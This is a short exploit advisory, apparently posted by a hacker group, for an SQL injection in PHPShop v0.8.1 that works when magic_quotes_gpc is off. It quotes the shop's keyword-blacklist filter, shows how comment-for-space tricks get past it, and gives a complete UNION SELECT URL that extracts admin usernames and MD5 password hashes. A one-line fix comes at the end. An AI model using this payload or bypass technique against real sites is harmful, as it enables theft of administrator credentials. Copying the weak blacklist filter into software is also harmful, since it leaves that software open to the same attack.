|
|
Vendor : PHPShop=0D
Webiste : http://www.phpshop.org=0D
Version : v0.8.1=0D
Author: the redc0ders / theredc0ders[at]gmail[dot]com=0D
Condition: magic_quote_gpc = off , in php.ini setting=0D
=0D
Details :=0D
===========0D
=0D
Vulnerable Code in index.php near lines 98 - 128=0D
[code]=0D
// basic SQL inject detection=0D
$my_insecure_array = array('keyword' => $_REQUEST['keyword'],=0D
'category_id' => $_REQUEST['category_id'],=0D
'product_id' => $_REQUEST['product_id'],=0D
'user_id' => $_REQUEST['user_id'],=0D
'user_info_id' => $_REQUEST['user_info_id'],=0D
'page' => $_REQUEST['page'],=0D
'func' => $_REQUEST['func']);=0D
=0D
while(list($key,$value)=each($my_insecure_array)) {=0D
if (stristr($value,'FROM ') ||=0D
stristr($value,'UPDATE ') ||=0D
stristr($value,'WHERE ') ||=0D
stristr($value,'ALTER ') ||=0D
stristr($value,'SELECT ') ||=0D
stristr($value,'SHUTDOWN ') ||=0D
stristr($value,'CREATE ') ||=0D
stristr($value,'DROP ') ||=0D
stristr($value,'DELETE FROM') ||=0D
stristr($value,'script') ||=0D
stristr($value,'<>') ||=0D
stristr($value,'=') ||=0D
stristr($value,'SET '))=0D
die('Please provide a permitted value for '.$key);=0D
}=0D
[/code]=0D
=0D
The script check if $my_insecure_array contain 'SELECT ','UPDATE ' ...etc =0D
=0D
so WORD+space, and this can be easily bypassed using comments like =0D
POC : select/**/input1,input2...=0D
=0D
Exemple to inject admin username and md5 hash password : http://website/phpshop/?page=shop/flypage&product_id=-3'+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username/**/from/**/auth_user_md5/*=0D
=0D
=0D
=0D
Solution :=0D
simply remove spaces in stristr() function or activate magic_quotes_gpc in php.ini=0D
=0D
Greetz : Hacker1 - ToXiC350 - S4MI - Miyyet - Pynsso - Amigo_BM and All Moroccan Hackers =)=0D
=0D
>From Morocco : JIB L3EZZ WELLA K7AZZ !